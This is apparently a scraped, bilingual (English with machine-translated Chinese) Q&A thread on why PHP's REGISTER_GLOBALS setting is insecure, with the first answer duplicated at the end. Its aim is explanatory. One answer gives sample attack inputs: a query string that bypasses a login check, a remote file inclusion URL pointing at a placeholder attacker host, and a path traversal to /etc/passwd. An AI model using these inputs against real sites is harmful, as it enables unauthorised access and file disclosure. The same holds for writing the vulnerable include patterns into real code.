I'm not a PHP developer but i've seen in a couple of places that people seem to treat it like the plague or something. Why?
我不是一个PHP开发人员,但我在几个地方看到人们似乎把它当作瘟疫之类的东西。为什么?
4 个解决方案
#1
13
REGISTER_GLOBALS means that all variables passed through GET or POST are avilable as global variables in your script. Since accessing undeclared variables is not an error in PHP (it's a warning), it can lead to very nasty situations. Consider this, for example:
REGISTER_GLOBALS意味着通过GET或POST传递的所有变量都可以作为脚本中的全局变量使用。由于访问未声明的变量不是PHP中的错误(这是一个警告),它可能会导致非常恶劣的情况。考虑一下,例如:
<?php
// $debug = true;
if ($debug) {
echo "query: $query\n";
}
It is not a bad thing per se (well engineered code should not generate warnings, therefore should not access any variables that might be undeclared (and should not need REGISTER_GLOBALS for the same reason)), but PHP code is usually [very] low quality, leading to this kind of security holes.
这本身并不是坏事(精心设计的代码不应该生成警告,因此不应该访问任何可能未声明的变量(并且出于同样的原因不应该需要REGISTER_GLOBALS)),但PHP代码通常[非常]低质量,导致这种安全漏洞。
#2
9
Enabling REGISTER_GLOBALS exposes webpages served by PHP to vulnerabilities which some bad guys will be keen to exploit.
启用REGISTER_GLOBALS会将PHP提供的网页暴露给一些坏人会热衷于利用的漏洞。
With it enabled, any query string at the end of the URL:
启用它后,URL末尾的任何查询字符串:
http://yourdomain/something.php?valid=true
will affect the value of a variable $valid (for example) in something.php, if it exists.
会影响something.php中变量$ valid(例如)的值(如果存在)。
If you're using publically available PHP code (a library for example) the names of variables are well known, and it would be possible for hackers to control their values by assigning values in the query string. They may be able to bypass authentication.
如果您使用公开可用的PHP代码(例如库),变量的名称是众所周知的,并且黑客可以通过在查询字符串中分配值来控制它们的值。他们可能能够绕过身份验证。
Even if you're not using public code, it may be possible to guess the names of important variables, and control their values.
即使您没有使用公共代码,也可以猜测重要变量的名称,并控制它们的值。
It used to be the default to have REGISTER_GLOBALS enabled in PHP.INI
它曾经是PHP.INI中启用REGISTER_GLOBALS的默认设置
Recent practice has been to disable it by default. Enable it at your own risk!
最近的做法是默认禁用它。启用它需要您自担风险!
#3
3
Just to add, here are some situations where having REGISTER_GLOBALS enabled could ruin your day:
只是添加,这里有一些情况,启用REGISTER_GLOBALS可能会破坏你的一天:
Using the query string to bypass access control (hack using http://example.com/?logged=1):
使用查询字符串绕过访问控制(使用http://example.com/?logged=1进行黑客攻击):
<?php
$logged = User::getLogged();
if ($logged)
{
include '/important/secret.php';
}
?>
Remote File Inclusion (RFI):
远程文件包含(RFI):
<?php
//http://example.com/?path=http://evilbadthings.example.com/
include "$path";
?>
Local File Inclusion (LFI):
本地文件包含(LFI):
<?php
//http://example.com/?path=../../../../etc/passwd
include "$path";
?>
#4
2
Because it allows the user to inject any global variable in your code without any control.
因为它允许用户在没有任何控制的情况下在代码中注入任何全局变量。
Based on the quality of the code, it may introduce major security bugs.
根据代码的质量,它可能会引入重大的安全漏洞。
#1
13
REGISTER_GLOBALS means that all variables passed through GET or POST are avilable as global variables in your script. Since accessing undeclared variables is not an error in PHP (it's a warning), it can lead to very nasty situations. Consider this, for example:
REGISTER_GLOBALS意味着通过GET或POST传递的所有变量都可以作为脚本中的全局变量使用。由于访问未声明的变量不是PHP中的错误(这是一个警告),它可能会导致非常恶劣的情况。考虑一下,例如:
<?php
// $debug = true;
if ($debug) {
echo "query: $query\n";
}
It is not a bad thing per se (well engineered code should not generate warnings, therefore should not access any variables that might be undeclared (and should not need REGISTER_GLOBALS for the same reason)), but PHP code is usually [very] low quality, leading to this kind of security holes.
这本身并不是坏事(精心设计的代码不应该生成警告,因此不应该访问任何可能未声明的变量(并且出于同样的原因不应该需要REGISTER_GLOBALS)),但PHP代码通常[非常]低质量,导致这种安全漏洞。
#2
9
Enabling REGISTER_GLOBALS exposes webpages served by PHP to vulnerabilities which some bad guys will be keen to exploit.
启用REGISTER_GLOBALS会将PHP提供的网页暴露给一些坏人会热衷于利用的漏洞。
With it enabled, any query string at the end of the URL:
启用它后,URL末尾的任何查询字符串:
http://yourdomain/something.php?valid=true
will affect the value of a variable $valid (for example) in something.php, if it exists.
会影响something.php中变量$ valid(例如)的值(如果存在)。
If you're using publically available PHP code (a library for example) the names of variables are well known, and it would be possible for hackers to control their values by assigning values in the query string. They may be able to bypass authentication.
如果您使用公开可用的PHP代码(例如库),变量的名称是众所周知的,并且黑客可以通过在查询字符串中分配值来控制它们的值。他们可能能够绕过身份验证。
Even if you're not using public code, it may be possible to guess the names of important variables, and control their values.
即使您没有使用公共代码,也可以猜测重要变量的名称,并控制它们的值。
It used to be the default to have REGISTER_GLOBALS enabled in PHP.INI
它曾经是PHP.INI中启用REGISTER_GLOBALS的默认设置
Recent practice has been to disable it by default. Enable it at your own risk!
最近的做法是默认禁用它。启用它需要您自担风险!
#3
3
Just to add, here are some situations where having REGISTER_GLOBALS enabled could ruin your day:
只是添加,这里有一些情况,启用REGISTER_GLOBALS可能会破坏你的一天:
Using the query string to bypass access control (hack using http://example.com/?logged=1):
使用查询字符串绕过访问控制(使用http://example.com/?logged=1进行黑客攻击):
<?php
$logged = User::getLogged();
if ($logged)
{
include '/important/secret.php';
}
?>
Remote File Inclusion (RFI):
远程文件包含(RFI):
<?php
//http://example.com/?path=http://evilbadthings.example.com/
include "$path";
?>
Local File Inclusion (LFI):
本地文件包含(LFI):
<?php
//http://example.com/?path=../../../../etc/passwd
include "$path";
?>
#4
2
Because it allows the user to inject any global variable in your code without any control.
因为它允许用户在没有任何控制的情况下在代码中注入任何全局变量。
Based on the quality of the code, it may introduce major security bugs.
根据代码的质量,它可能会引入重大的安全漏洞。